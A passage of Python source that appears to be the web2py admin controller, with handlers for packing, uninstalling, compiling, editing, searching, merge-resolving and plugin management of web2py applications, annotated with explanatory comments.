        # Whitelist: only accept paths that really exist under the app.
        valid_set = set(os.path.relpath(os.path.join(r, f), base) for r in files for f in files[r]['files'])
        files = request.post_vars.file
        files = [files] if not isinstance(files, list) else files
        files = [file for file in files if file in valid_set]
        if request.post_vars.doexe is None:
            fname = 'web2py.app.%s.w2p' % app
            pferror = None
            try:
                filename = app_pack(app, request, raise_ex=True, filenames=files)
            except Exception as e:
                # Capture the error: on Python 3 the `as e` binding is
                # deleted after the except clause, so the original's
                # later use of `e` raised NameError instead of flashing.
                pferror = e
                filename = None
            if filename:
                response.headers['Content-Type'] = 'application/w2p'
                disposition = 'attachment; filename=%s' % fname
                response.headers['Content-Disposition'] = disposition
                return safe_read(filename, 'rb')
            else:
                session.flash = T('internal error: %s', pferror)
                redirect(URL(args=request.args))
        else:
            return pack_exe(app, base, files)
    return locals()
def upgrade_web2py():
    """Ask for confirmation, then upgrade web2py in place."""
    dialog = FORM.confirm(T('Upgrade'),
                          {T('Cancel'): URL('site')})
    if dialog.accepted:
        (success, error) = upgrade(request)
        # A restart is required for the new code to take effect.
        session.flash = (T('web2py upgraded; please restart it') if success
                         else T('unable to upgrade because "%s"', error))
        redirect(URL('site'))
    return dict(dialog=dialog)
def uninstall():
    """Confirm and uninstall an application.

    The app is packed into a .w2p first so an accidental uninstall is
    recoverable; in multi-user mode only managers or the app's owner
    may proceed.
    """
    app = get_app()
    dialog = FORM.confirm(T('Uninstall'),
                          {T('Cancel'): URL('site')})
    dialog['_id'] = 'confirm_form'
    dialog['_class'] = 'well'
    for component in dialog.components:
        component['_class'] = 'btn'
    if dialog.accepted:
        if MULTI_USER_MODE:
            # managers may delete any app record; owners only their own
            if is_manager() and db(db.app.name == app).delete():
                pass
            elif db(db.app.name == app)(db.app.owner == auth.user.id).delete():
                pass
            else:
                session.flash = T('no permission to uninstall "%s"', app)
                redirect(URL('site'))
        try:
            # back up before removing anything
            filename = app_pack(app, request, raise_ex=True)
        except:
            session.flash = T('unable to uninstall "%s"', app)
        else:
            if app_uninstall(app, request):
                session.flash = T('application "%s" uninstalled', app)
            else:
                session.flash = T('unable to uninstall "%s"', app)
        redirect(URL('site'))
    return dict(app=app, dialog=dialog)
def cleanup():
    """Wipe an application's cache, errors and sessions folders."""
    app = get_app()
    if app_cleanup(app, request):
        session.flash = T('cache, errors and sessions cleaned')
    else:
        session.flash = T("some files could not be removed")
    redirect(URL('site'))
def compile_app():
    """Byte-compile an application, reporting any views that failed."""
    app = get_app()
    result = app_compile(app, request,
                         skip_failed_views=(request.args(1) == 'skip_failed_views'))
    if not result:
        # Full success.
        session.flash = T('application compiled')
    elif isinstance(result, list):
        # Compiled, but some views had to be skipped.
        parts = [T('application compiled'), BR(), BR(),
                 T('WARNING: The following views could not be compiled:'), BR()]
        parts += [CAT(BR(), view) for view in result]
        parts += [BR(), BR(), T('DO NOT use the "Pack compiled" feature.')]
        session.flash = DIV(*parts)
    else:
        # Compilation aborted with an error message.
        session.flash = DIV(T('Cannot compile: there are errors in your app:'),
                            CODE(result))
    redirect(URL('site'))
def remove_compiled_app():
    """Drop an application's byte-compiled files, restoring source mode."""
    application = get_app()
    remove_compiled_application(apath(application, r=request))
    session.flash = T('compiled application removed')
    redirect(URL('site'))
def delete():
    """ Object delete handler.

    Confirms, removes the file named by ``request.args``, and records
    the (negative) line count in the app's progress log.
    """
    app = get_app()
    filename = '/'.join(request.args)
    sender = request.vars.sender
    if isinstance(sender, list):  # ## fix a problem with Vista
        sender = sender[0]
    dialog = FORM.confirm(T('Delete'),
                          {T('Cancel'): URL(sender, anchor=request.vars.id)})
    if dialog.accepted:
        try:
            full_path = apath(filename, r=request)
            # Close the handle deterministically (the original leaked it).
            with open(full_path, 'r') as src:
                lineno = count_lines(src.read())
            os.unlink(full_path)
            log_progress(app, 'DELETE', filename, progress=-lineno)
            session.flash = T('file "%(filename)s" deleted',
                              dict(filename=filename))
        except Exception:
            session.flash = T('unable to delete file "%(filename)s"',
                              dict(filename=filename))
        redirect(URL(sender, anchor=request.vars.id2))
    return dict(dialog=dialog, filename=filename)
def enable():
    """Toggle an application's DISABLED marker file.

    Returns a SPAN labelled with the *next* available toggle action.
    """
    # Signed-URL check guards this state-changing GET against CSRF.
    if not URL.verify(request, hmac_key=session.hmac_key):
        raise HTTP(401)
    app = get_app()
    filename = os.path.join(apath(app, r=request), 'DISABLED')
    if is_gae:
        return SPAN(T('Not supported'), _style='color:yellow')
    if os.path.exists(filename):
        # Currently disabled -> enable by removing the marker.
        os.unlink(filename)
        return SPAN(T('Disable'), _style='color:green')
    # Currently enabled -> disable by writing the marker.
    marker = 'disabled: True\ntime-disabled: %s' % request.now
    if PY2:
        safe_open(filename, 'wb').write(marker)
    else:
        safe_open(filename, 'wb').write(marker.encode('utf-8'))
    return SPAN(T('Enable'), _style='color:red')
def peek():
    """Read-only view of a source file (no editing)."""
    app = get_app(request.vars.app)
    filename = '/'.join(request.args)
    # An explicit ?app= means the path is absolute, not app-relative.
    path = abspath(filename) if request.vars.app else apath(filename, r=request)
    try:
        data = safe_read(path).replace('\r', '')
    except IOError:
        session.flash = T('file does not exist')
        redirect(URL('site'))
    extension = filename[filename.rfind('.') + 1:].lower()
    return dict(app=app,
                filename=filename,
                data=data,
                extension=extension)
def test():
    """ Execute controller tests.

    An optional second request arg restricts testing to matching
    controller files; otherwise every ``*.py`` controller is listed.
    """
    app = get_app()
    if len(request.args) > 1:
        pattern = request.args[1]
    else:
        # Raw string: '\.' in a plain literal is an invalid escape
        # sequence (DeprecationWarning on Python 3.6+).
        pattern = r'.*\.py'
    # Renamed from `file` to avoid shadowing the PY2 builtin.
    controllers = listdir(
        apath('%s/controllers/' % app, r=request), pattern + '$')
    return dict(app=app, controllers=controllers)
def keepalive():
    """Ajax ping endpoint; returns an empty body to keep the session alive."""
    return ''
def search():
    """Ajax endpoint: list app files whose contents contain the keywords."""
    keywords = request.vars.keywords or ''
    app = get_app()

    def contains_keywords(relname):
        # Plain substring search over the raw file contents.
        target = os.path.join(apath(app, r=request), relname)
        return keywords in read_file(target, 'r')

    path = apath(request.args[0], r=request)
    candidates = (glob(os.path.join(path, '*/*.py')) +
                  glob(os.path.join(path, '*/*.html')) +
                  glob(os.path.join(path, '*/*/*.html')))
    files = [x[len(path) + 1:].replace('\\', '/')
             for x in candidates if contains_keywords(x)]
    return response.json(dict(files=files, message=T.M('Searching: **%s** %%{file}', len(files))))
def edit():
    """ File edit handler.

    Serves the editor scaffolding on a normal GET, handles the
    editor-settings tab, and otherwise loads/saves/reverts the file
    named by ``request.args``, answering either JSON (ajax) or a
    rendered page.
    """
    # Load json only if it is ajax edited...
    app = get_app(request.vars.app)
    app_path = apath(app, r=request)
    # Default editor preferences; settings.cfg overrides them below.
    preferences = {'theme': 'web2py', 'editor': 'default', 'closetag': 'true', 'codefolding': 'false', 'tabwidth': '4', 'indentwithtabs': 'false', 'linenumbers': 'true', 'highlightline': 'true'}
    config = Config(os.path.join(request.folder, 'settings.cfg'),
                    section='editor', default_values={})
    preferences.update(config.read())
    if not(request.ajax) and not(is_mobile):
        # return the scaffolding, the rest will be through ajax requests
        response.title = T('Editing %s') % app
        return response.render('default/edit.html', dict(app=app, editor_settings=preferences))
    # show settings tab and save prefernces
    if 'settings' in request.vars:
        if request.post_vars:  # save new preferences
            if PY2:
                post_vars = request.post_vars.items()
            else:
                post_vars = list(request.post_vars.items())
            # Since unchecked checkbox are not serialized, we must set them as false by hand to store the correct preference in the settings
            post_vars += [(opt, 'false') for opt in preferences if opt not in request.post_vars]
            if config.save(post_vars):
                response.headers["web2py-component-flash"] = T('Preferences saved correctly')
            else:
                response.headers["web2py-component-flash"] = T('Preferences saved on session only')
            response.headers["web2py-component-command"] = "update_editor(%s);$('a[href=#editor_settings] button.close').click();" % response.json(config.read())
            return
        else:
            details = {'realfilename': 'settings', 'filename': 'settings', 'id': 'editor_settings', 'force': False}
            details['plain_html'] = response.render('default/editor_settings.html', {'editor_settings': preferences})
            return response.json(details)
    """ File edit handler """
    # Load json only if it is ajax edited...
    app = get_app(request.vars.app)
    filename = '/'.join(request.args)
    realfilename = request.args[-1]
    if request.vars.app:
        path = abspath(filename)
    else:
        path = apath(filename, r=request)
    # Try to discover the file type
    if filename[-3:] == '.py':
        filetype = 'python'
    elif filename[-5:] == '.html':
        filetype = 'html'
    elif filename[-5:] == '.load':
        filetype = 'html'
    elif filename[-4:] == '.css':
        filetype = 'css'
    elif filename[-3:] == '.js':
        filetype = 'javascript'
    else:
        filetype = 'html'
    # ## check if file is not there
    if ('revert' in request.vars) and os.path.exists(path + '.bak'):
        # revert: swap the file with its .bak copy
        try:
            data = safe_read(path + '.bak')
            data1 = safe_read(path)
        except IOError:
            session.flash = T('Invalid action')
            if 'from_ajax' in request.vars:
                return response.json({'error': str(T('Invalid action'))})
            else:
                redirect(URL('site'))
        safe_write(path, data)
        file_hash = md5_hash(data)
        saved_on = time.ctime(os.stat(path)[stat.ST_MTIME])
        safe_write(path + '.bak', data1)
        response.flash = T('file "%s" of %s restored', (filename, saved_on))
    else:
        try:
            data = safe_read(path)
        except IOError:
            session.flash = T('Invalid action')
            if 'from_ajax' in request.vars:
                return response.json({'error': str(T('Invalid action'))})
            else:
                redirect(URL('site'))
        lineno_old = count_lines(data)
        file_hash = md5_hash(data)
        saved_on = time.ctime(os.stat(path)[stat.ST_MTIME])
        if request.vars.file_hash and request.vars.file_hash != file_hash:
            # concurrent edit detected: stash the new version as .1 and
            # send the user to the merge resolver
            session.flash = T('file changed on disk')
            data = request.vars.data.replace('\r\n', '\n').strip() + '\n'
            safe_write(path + '.1', data)
            if 'from_ajax' in request.vars:
                return response.json({'error': str(T('file changed on disk')),
                                      'redirect': URL('resolve',
                                                      args=request.args)})
            else:
                redirect(URL('resolve', args=request.args))
        elif request.vars.data:
            # normal save: keep a .bak of the previous content
            safe_write(path + '.bak', data)
            data = request.vars.data.replace('\r\n', '\n').strip() + '\n'
            safe_write(path, data)
            lineno_new = count_lines(data)
            log_progress(
                app, 'EDIT', filename, progress=lineno_new - lineno_old)
            file_hash = md5_hash(data)
            saved_on = time.ctime(os.stat(path)[stat.ST_MTIME])
            response.flash = T('file saved on %s', saved_on)
    data_or_revert = (request.vars.data or request.vars.revert)
    # Check compile errors
    highlight = None
    if filetype == 'python' and request.vars.data:
        import _ast
        try:
            code = request.vars.data.rstrip().replace('\r\n', '\n') + '\n'
            compile(code, path, "exec", _ast.PyCF_ONLY_AST)
        except Exception as e:
            # offset calculation is only used for textarea (start/stop)
            start = sum([len(line) + 1 for l, line
                         in enumerate(request.vars.data.split("\n"))
                         if l < e.lineno - 1])
            if e.text and e.offset:
                offset = e.offset - (len(e.text) - len(
                    e.text.splitlines()[-1]))
            else:
                offset = 0
            highlight = {'start': start, 'end': start +
                         offset + 1, 'lineno': e.lineno, 'offset': offset}
            try:
                ex_name = e.__class__.__name__
            except:
                ex_name = 'unknown exception!'
            response.flash = DIV(T('failed to compile file because:'), BR(),
                                 B(ex_name), ' ' + T('at line %s', e.lineno),
                                 offset and ' ' +
                                 T('at char %s', offset) or '',
                                 PRE(repr(e)))
    if data_or_revert and request.args[1] == 'modules':
        # Lets try to reload the modules
        try:
            mopath = '.'.join(request.args[2:])[:-3]
            exec('import applications.%s.modules.%s' % (
                request.args[0], mopath))
            reload(sys.modules['applications.%s.modules.%s'
                               % (request.args[0], mopath)])
        except Exception as e:
            response.flash = DIV(
                T('failed to reload module because:'), PRE(repr(e)))
    edit_controller = None
    editviewlinks = None
    view_link = None
    if filetype == 'html' and len(request.args) >= 3:
        # editing a view: link back to its controller and rendered page
        cfilename = os.path.join(request.args[0], 'controllers',
                                 request.args[2] + '.py')
        if os.path.exists(apath(cfilename, r=request)):
            edit_controller = URL('edit', args=[cfilename.replace(os.sep, "/")])
            view = request.args[3].replace('.html', '')
            view_link = URL(request.args[0], request.args[2], view)
    elif filetype == 'python' and request.args[1] == 'controllers':
        # it's a controller file.
        # Create links to all of the associated view files.
        app = get_app()
        viewname = os.path.splitext(request.args[2])[0]
        viewpath = os.path.join(app, 'views', viewname)
        aviewpath = apath(viewpath, r=request)
        viewlist = []
        if os.path.exists(aviewpath):
            if os.path.isdir(aviewpath):
                viewlist = glob(os.path.join(aviewpath, '*.html'))
        elif os.path.exists(aviewpath + '.html'):
            viewlist.append(aviewpath + '.html')
        if len(viewlist):
            editviewlinks = []
            for v in sorted(viewlist):
                vf = os.path.split(v)[-1]
                vargs = "/".join([viewpath.replace(os.sep, "/"), vf])
                editviewlinks.append(A(vf.split(".")[0],
                                       _class="editor_filelink",
                                       _href=URL('edit', args=[vargs])))
    if len(request.args) > 2 and request.args[1] == 'controllers':
        controller = (request.args[2])[:-3]
        try:
            functions = find_exposed_functions(data)
            functions = functions and sorted(functions) or []
        except SyntaxError as err:
            functions = ['SyntaxError:Line:%d' % err.lineno]
    else:
        (controller, functions) = (None, None)
    if 'from_ajax' in request.vars:
        return response.json({'file_hash': file_hash, 'saved_on': saved_on, 'functions': functions, 'controller': controller, 'application': request.args[0], 'highlight': highlight})
    else:
        file_details = dict(app=request.args[0],
                            lineno=request.vars.lineno or 1,
                            editor_settings=preferences,
                            filename=filename,
                            realfilename=realfilename,
                            filetype=filetype,
                            data=data,
                            edit_controller=edit_controller,
                            file_hash=file_hash,
                            saved_on=saved_on,
                            controller=controller,
                            functions=functions,
                            view_link=view_link,
                            editviewlinks=editviewlinks,
                            id=IS_SLUG()(filename)[0],
                            force=True if (request.vars.restore or
                                           request.vars.revert) else False)
        plain_html = response.render('default/edit_js.html', file_details)
        file_details['plain_html'] = plain_html
        if is_mobile:
            return response.render('default.mobile/edit.html',
                                   file_details, editor_settings=preferences)
        else:
            return response.json(file_details)
def todolist():
    """Scan the requested app for ``# TODO`` comments.

    Searches the models, controllers, modules and private .py files and
    returns ``{'todo': [...], 'app': app}`` where each entry carries the
    matched comment text and its 1-based line number.
    """
    app = request.vars.app or ''
    app_path = apath('%(app)s' % {'app': app}, r=request)
    dirs = ['models', 'controllers', 'modules', 'private']

    def listfiles(app, dir, regexp=r'.*\.py$'):
        # Non-backup python files of one app subfolder, '/'-separated.
        files = sorted(listdir(apath('%(app)s/%(dir)s/' % {'app': app, 'dir': dir}, r=request), regexp))
        files = [x.replace(os.path.sep, '/') for x in files if not x.endswith('.bak')]
        return files
    # Raw string: '\s' in a plain literal is an invalid escape sequence.
    pattern = r'#\s*(todo)+\s+(.*)'
    regex = re.compile(pattern, re.IGNORECASE)
    output = []
    for d in dirs:
        for f in listfiles(app, d):
            matches = []
            filename = apath(os.path.join(app, d, f), r=request)
            with safe_open(filename, 'r') as f_s:
                src = f_s.read()
            for m in regex.finditer(src):
                start = m.start()
                lineno = src.count('\n', 0, start) + 1
                matches.append({'text': m.group(0), 'lineno': lineno})
            if len(matches) != 0:
                output.append({'filename': f, 'matches': matches, 'dir': d})
    return {'todo': output, 'app': app}
def editor_sessions():
    """Persist and render named editor file-session lists."""
    config = Config(os.path.join(request.folder, 'settings.cfg'),
                    section='editor_sessions', default_values={})
    preferences = config.read()
    session_name = request.vars.session_name
    selected_files = request.vars.files
    if session_name and selected_files:
        # Sessions are stored as a comma-joined file list per name.
        preferences.update({session_name: ','.join(selected_files)})
        if config.save(preferences.items()):
            response.headers["web2py-component-flash"] = T('Session saved correctly')
        else:
            response.headers["web2py-component-flash"] = T('Session saved on session only')
    return response.render('default/editor_sessions.html', {'editor_sessions': preferences})
def resolve():
    """Merge resolver: reconcile a file with its competing '.1' edit.

    Shows an ndiff between the saved file and the stashed concurrent
    edit; on POST, keeps the common lines plus the selected ones and
    writes the merge back.
    """
    filename = '/'.join(request.args)
    # ## check if file is not there
    path = apath(filename, r=request)
    a = safe_read(path).split('\n')
    try:
        b = safe_read(path + '.1').split('\n')
    except IOError:
        session.flash = 'Other file, no longer there'
        redirect(URL('edit', args=request.args))
    d = difflib.ndiff(a, b)
    def leading(line):
        """Render the line's leading whitespace for HTML display."""
        # TODO: we really need to comment this
        z = ''
        for (k, c) in enumerate(line):
            if c == ' ':
                z += ' '
            elif c == ' \t':
                z += ' '
            elif k == 0 and c == '?':
                pass
            else:
                break
        return XML(z)
    def getclass(item):
        """ Determine item class """
        # ndiff prefixes: ' ' common, '+' added, '-' removed.
        operators = {' ': 'normal', '+': 'plus', '-': 'minus'}
        return operators[item[0]]
    if request.vars:
        # POST: keep common lines and every explicitly-checked line.
        c = '\n'.join([item[2:].rstrip() for (i, item) in enumerate(d) if item[0]
                       == ' ' or 'line%i' % i in request.vars])
        safe_write(path, c)
        session.flash = 'files merged'
        redirect(URL('edit', args=request.args))
    else:
        # Making the short circuit compatible with <= python2.4
        gen_data = lambda index, item: not item[:1] in ['+', '-'] and "" \
            or INPUT(_type='checkbox',
                     _name='line%i' % index,
                     value=item[0] == '+')
        diff = TABLE(*[TR(TD(gen_data(i, item)),
                          TD(item[0]),
                          TD(leading(item[2:]),
                             TT(item[2:].rstrip())),
                          _class=getclass(item))
                       for (i, item) in enumerate(d) if item[0] != '?'])
    return dict(diff=diff, filename=filename)
def edit_language():
    """ Edit language file: render every translation string as a form
    field and write the updated dictionary back on submit. """
    app = get_app()
    filename = '/'.join(request.args)
    response.title = request.args[-1]
    strings = read_dict(apath(filename, r=request))
    if '__corrupted__' in strings:
        # the file could not be parsed; show the error instead of a form
        form = SPAN(strings['__corrupted__'], _class='error')
        return dict(filename=filename, form=form)
    keys = sorted(strings.keys(), key=lambda x: to_native(x).lower())
    rows = []
    rows.append(H2(T('Original/Translation')))
    for key in keys:
        name = md5_hash(key)
        s = strings[key]
        # '\x01' separates an optional context prefix from the key
        (prefix, sep, key) = key.partition('\x01')
        if sep:
            prefix = SPAN(prefix + ': ', _class='tm_ftag')
            k = key
        else:
            (k, prefix) = (prefix, '')
        _class = 'untranslated' if k == s else 'translated'
        # short strings get a text input, long ones a textarea
        if len(s) <= 40:
            elem = INPUT(_type='text', _name=name, value=s,
                         _size=70, _class=_class)
        else:
            elem = TEXTAREA(_name=name, value=s, _cols=70,
                            _rows=5, _class=_class)
        # Making the short circuit compatible with <= python2.4
        k = (s != k) and k or B(k)
        new_row = DIV(LABEL(prefix, k, _style="font-weight:normal;"),
                      CAT(elem, '\n', TAG.BUTTON(
                          T('delete'),
                          _onclick='return delkey("%s")' % name,
                          _class='btn')), _id=name, _class='span6 well well-small')
        rows.append(DIV(new_row, _class="row-fluid"))
    rows.append(DIV(INPUT(_type='submit', _value=T('update'), _class="btn btn-primary"), _class='controls'))
    form = FORM(*rows)
    if form.accepts(request.vars, keepvalues=True):
        strs = dict()
        for key in keys:
            name = md5_hash(key)
            # chr(127) marks a key the user deleted in the UI
            if form.vars[name] == chr(127):
                continue
            strs[key] = form.vars[name]
        write_dict(apath(filename, r=request), strs)
        session.flash = T('file saved on %(time)s', dict(time=time.ctime()))
        redirect(URL(r=request, args=request.args))
    return dict(app=request.args[0], filename=filename, form=form)
def edit_plurals():
    """ Edit plurals file: one row per singular form, with an input per
    plural form; writes the dictionary back on submit. """
    app = get_app()
    filename = '/'.join(request.args)
    plurals = read_plural_dict(
        apath(filename, r=request))  # plural forms dictionary
    nplurals = int(request.vars.nplurals) - 1  # plural forms quantity
    # NOTE(review): xrange/cmp/unicode are Python-2 builtins; presumably
    # supplied here by gluon's compat layer — verify before running on PY3.
    xnplurals = xrange(nplurals)
    if '__corrupted__' in plurals:
        # show error message and exit
        form = SPAN(plurals['__corrupted__'], _class='error')
        return dict(filename=filename, form=form)
    keys = sorted(plurals.keys(), lambda x, y: cmp(
        unicode(x, 'utf-8').lower(), unicode(y, 'utf-8').lower()))
    tab_rows = []
    for key in keys:
        name = md5_hash(key)
        forms = plurals[key]
        # pad missing plural forms so every row has nplurals inputs
        if len(forms) < nplurals:
            forms.extend(None for i in xrange(nplurals - len(forms)))
        tab_col1 = DIV(CAT(LABEL(T("Singular Form")), B(key,
                                                        _class='fake-input')))
        tab_inputs = [SPAN(LABEL(T("Plural Form #%s", n + 1)), INPUT(_type='text', _name=name + '_' + str(n), value=forms[n], _size=20), _class='span6') for n in xnplurals]
        tab_col2 = DIV(CAT(*tab_inputs))
        tab_col3 = DIV(CAT(LABEL(XML(' ')), TAG.BUTTON(T('delete'), _onclick='return delkey("%s")' % name, _class='btn'), _class='span6'))
        tab_row = DIV(DIV(tab_col1, '\n', tab_col2, '\n', tab_col3, _class='well well-small'), _id=name, _class='row-fluid tab_row')
        tab_rows.append(tab_row)
    tab_rows.append(DIV(TAG['button'](T('update'), _type='submit',
                                      _class='btn btn-primary'),
                        _class='controls'))
    tab_container = DIV(*tab_rows, **dict(_class="row-fluid"))
    form = FORM(tab_container)
    if form.accepts(request.vars, keepvalues=True):
        new_plurals = dict()
        for key in keys:
            name = md5_hash(key)
            # chr(127) marks a key the user deleted in the UI
            if form.vars[name + '_0'] == chr(127):
                continue
            new_plurals[key] = [form.vars[name + '_' + str(n)]
                                for n in xnplurals]
        write_plural_dict(apath(filename, r=request), new_plurals)
        session.flash = T('file saved on %(time)s', dict(time=time.ctime()))
        redirect(URL(r=request, args=request.args, vars=dict(
            nplurals=request.vars.nplurals)))
    return dict(app=request.args[0], filename=filename, form=form)
def about():
    """Show an application's ABOUT and LICENSE files plus its history."""
    app = get_app()
    # Both files are expected in the application root, MARKMIN-formatted.
    about_text = safe_read(apath('%s/ABOUT' % app, r=request))
    license_text = safe_read(apath('%s/LICENSE' % app, r=request))
    return dict(app=app, about=MARKMIN(about_text), license=MARKMIN(license_text), progress=report_progress(app))
def design():
    """ Application design handler: inventories every editable asset of
    the app (models, controllers, views, modules, private, static,
    languages, crontab, plugins) for the design page, and processes
    plugin uploads. """
    app = get_app()
    if not response.flash and app == request.application:
        msg = T('ATTENTION: you cannot edit the running application!')
        response.flash = msg
    # anti-CSRF: state-changing posts must carry the session token
    if request.vars and not request.vars.token == session.token:
        redirect(URL('logout'))
    if request.vars.pluginfile is not None and not isinstance(request.vars.pluginfile, str):
        # a real upload object was posted: install the plugin
        filename = os.path.basename(request.vars.pluginfile.filename)
        if plugin_install(app, request.vars.pluginfile.file,
                          request, filename):
            session.flash = T('new plugin installed')
            redirect(URL('design', args=app))
        else:
            session.flash = \
                T('unable to install plugin "%s"', filename)
            redirect(URL(r=request, args=app))
    elif isinstance(request.vars.pluginfile, str):
        # the field was submitted empty
        session.flash = T('plugin not specified')
        redirect(URL(r=request, args=app))
    # If we have only pyc files it means that
    # we cannot design
    if os.path.exists(apath('%s/compiled' % app, r=request)):
        session.flash = \
            T('application is compiled and cannot be designed')
        redirect(URL('site'))
    # Get all models
    models = listdir(apath('%s/models/' % app, r=request), '.*\.py$')
    models = [x.replace('\\', '/') for x in models]
    defines = {}
    for m in models:
        data = safe_read(apath('%s/models/%s' % (app, m), r=request))
        defines[m] = re.findall(REGEX_DEFINE_TABLE, data, re.MULTILINE)
        defines[m].sort()
    # Get all controllers
    controllers = sorted(
        listdir(apath('%s/controllers/' % app, r=request), '.*\.py$'))
    controllers = [x.replace('\\', '/') for x in controllers]
    functions = {}
    for c in controllers:
        data = safe_read(apath('%s/controllers/%s' % (app, c), r=request))
        try:
            items = find_exposed_functions(data)
            functions[c] = items and sorted(items) or []
        except SyntaxError as err:
            functions[c] = ['SyntaxError:Line:%d' % err.lineno]
    # Get all views
    views = sorted(
        listdir(apath('%s/views/' % app, r=request), '[\w/\-]+(\.\w+)+$'))
    views = [x.replace('\\', '/') for x in views if not x.endswith('.bak')]
    extend = {}
    include = {}
    for c in views:
        data = safe_read(apath('%s/views/%s' % (app, c), r=request))
        items = re.findall(REGEX_EXTEND, data, re.MULTILINE)
        if items:
            extend[c] = items[0][1]
        items = re.findall(REGEX_INCLUDE, data)
        include[c] = [i[1] for i in items]
    # Get all modules
    modules = listdir(apath('%s/modules/' % app, r=request), '.*\.py$')
    modules = modules = [x.replace('\\', '/') for x in modules]
    modules.sort()
    # Get all private files
    privates = listdir(apath('%s/private/' % app, r=request), '[^\.#].*')
    privates = [x.replace('\\', '/') for x in privates]
    privates.sort()
    # Get all static files
    statics = listdir(apath('%s/static/' % app, r=request), '[^\.#].*',
                      maxnum=MAXNFILES)
    statics = [x.replace(os.path.sep, '/') for x in statics]
    statics.sort()
    # Get all languages
    langpath = os.path.join(apath(app, r=request), 'languages')
    languages = dict([(lang, info) for lang, info
                      in iteritems(read_possible_languages(langpath))
                      if info[2] != 0])  # info[2] is langfile_mtime:
    # get only existed files
    # Get crontab
    cronfolder = apath('%s/cron' % app, r=request)
    crontab = apath('%s/cron/crontab' % app, r=request)
    if not is_gae:
        if not os.path.exists(cronfolder):
            os.mkdir(cronfolder)
        if not os.path.exists(crontab):
            safe_write(crontab, '#crontab')
    plugins = []
    def filter_plugins(items, plugins):
        # split plugin_* entries out of items and register their names
        plugins += [item[7:].split('/')[0].split(
            '.')[0] for item in items if item.startswith('plugin_')]
        plugins[:] = list(set(plugins))
        plugins.sort()
        return [item for item in items if not item.startswith('plugin_')]
    return dict(app=app,
                models=filter_plugins(models, plugins),
                defines=defines,
                controllers=filter_plugins(controllers, plugins),
                functions=functions,
                views=filter_plugins(views, plugins),
                modules=filter_plugins(modules, plugins),
                extend=extend,
                include=include,
                privates=filter_plugins(privates, plugins),
                statics=filter_plugins(statics, plugins),
                languages=languages,
                crontab=crontab,
                plugins=plugins)
def delete_plugin():
    """Confirm and remove every file/folder belonging to a plugin."""
    app = request.args(0)
    plugin = request.args(1)
    plugin_name = 'plugin_' + plugin
    dialog = FORM.confirm(
        T('Delete'),
        {T('Cancel'): URL('design', args=app)})
    if dialog.accepted:
        try:
            # A plugin's pieces live in each of these app folders, all
            # named plugin_<name>.* or plugin_<name>/.
            for folder in ['models', 'views', 'controllers', 'static', 'modules', 'private']:
                folder_path = os.path.join(apath(app, r=request), folder)
                for item in os.listdir(folder_path):
                    if item.rsplit('.', 1)[0] != plugin_name:
                        continue
                    target = os.path.join(folder_path, item)
                    if os.path.isdir(target):
                        shutil.rmtree(target)
                    else:
                        os.unlink(target)
            session.flash = T('plugin "%(plugin)s" deleted',
                              dict(plugin=plugin))
        except Exception:
            session.flash = T('unable to delete file plugin "%(plugin)s"',
                              dict(plugin=plugin))
        redirect(URL('design', args=request.args(0), anchor=request.vars.id2))
    return dict(dialog=dialog, plugin=plugin)
def plugin():
    """ Application design handler restricted to a single plugin:
    inventories the app's assets like design() but filters every list
    down to the files belonging to the requested plugin. """
    app = get_app()
    plugin = request.args(1)
    if not response.flash and app == request.application:
        msg = T('ATTENTION: you cannot edit the running application!')
        response.flash = msg
    # If we have only pyc files it means that
    # we cannot design
    if os.path.exists(apath('%s/compiled' % app, r=request)):
        session.flash = \
            T('application is compiled and cannot be designed')
        redirect(URL('site'))
    # Get all models
    models = listdir(apath('%s/models/' % app, r=request), '.*\.py$')
    models = [x.replace('\\', '/') for x in models]
    defines = {}
    for m in models:
        data = safe_read(apath('%s/models/%s' % (app, m), r=request))
        defines[m] = re.findall(REGEX_DEFINE_TABLE, data, re.MULTILINE)
        defines[m].sort()
    # Get all controllers
    controllers = sorted(
        listdir(apath('%s/controllers/' % app, r=request), '.*\.py$'))
    controllers = [x.replace('\\', '/') for x in controllers]
    functions = {}
    for c in controllers:
        data = safe_read(apath('%s/controllers/%s' % (app, c), r=request))
        try:
            items = find_exposed_functions(data)
            functions[c] = items and sorted(items) or []
        except SyntaxError as err:
            functions[c] = ['SyntaxError:Line:%d' % err.lineno]
    # Get all views
    views = sorted(
        listdir(apath('%s/views/' % app, r=request), '[\w/\-]+\.\w+$'))
    views = [x.replace('\\', '/') for x in views]
    extend = {}
    include = {}
    for c in views:
        data = safe_read(apath('%s/views/%s' % (app, c), r=request))
        items = re.findall(REGEX_EXTEND, data, re.MULTILINE)
        if items:
            extend[c] = items[0][1]
        items = re.findall(REGEX_INCLUDE, data)
        include[c] = [i[1] for i in items]
    # Get all modules
    modules = listdir(apath('%s/modules/' % app, r=request), '.*\.py$')
    modules = modules = [x.replace('\\', '/') for x in modules]
    modules.sort()
    # Get all private files
    privates = listdir(apath('%s/private/' % app, r=request), '[^\.#].*')
    privates = [x.replace('\\', '/') for x in privates]
    privates.sort()
    # Get all static files
    statics = listdir(apath('%s/static/' % app, r=request), '[^\.#].*',
                      maxnum=MAXNFILES)
    statics = [x.replace(os.path.sep, '/') for x in statics]
    statics.sort()
    # Get all languages
    languages = sorted([lang + '.py' for lang, info in
                        iteritems(T.get_possible_languages_info())
                        if info[2] != 0])  # info[2] is langfile_mtime:
    # get only existed files
    # Get crontab
    crontab = apath('%s/cron/crontab' % app, r=request)
    if not os.path.exists(crontab):
        safe_write(crontab, '#crontab')
    def filter_plugins(items):
        # keep only entries that belong to this plugin
        regex = re.compile('^plugin_' + plugin + '(/.*|\..*)?$')
        return [item for item in items if item and regex.match(item)]
    return dict(app=app,
                models=filter_plugins(models),
                defines=defines,
                controllers=filter_plugins(controllers),
                functions=functions,
                views=filter_plugins(views),
                modules=filter_plugins(modules),
                extend=extend,
                include=include,
                privates=filter_plugins(privates),
                statics=filter_plugins(statics),
                languages=languages,
                crontab=crontab)
def create_file():
    """Create a new file inside an application.

    Dispatches on the target folder suffix (rules/languages/models/
    controllers/views/modules/static/private) to enforce a filename
    extension and choose boilerplate content, writes the file, then
    redirects back to the sender (or into the editor when created
    from the file tree).
    """
    # CSRF guard: mutating admin requests must carry the session token.
    if request.vars and not request.vars.token == session.token:
        redirect(URL('logout'))
    try:
        anchor = '#' + request.vars.id if request.vars.id else ''
        if request.vars.app:
            app = get_app(request.vars.app)
            path = abspath(request.vars.location)
        else:
            if request.vars.dir:
                request.vars.location += request.vars.dir + '/'
            app = get_app(name=request.vars.location.split('/')[0])
            path = apath(request.vars.location, r=request)
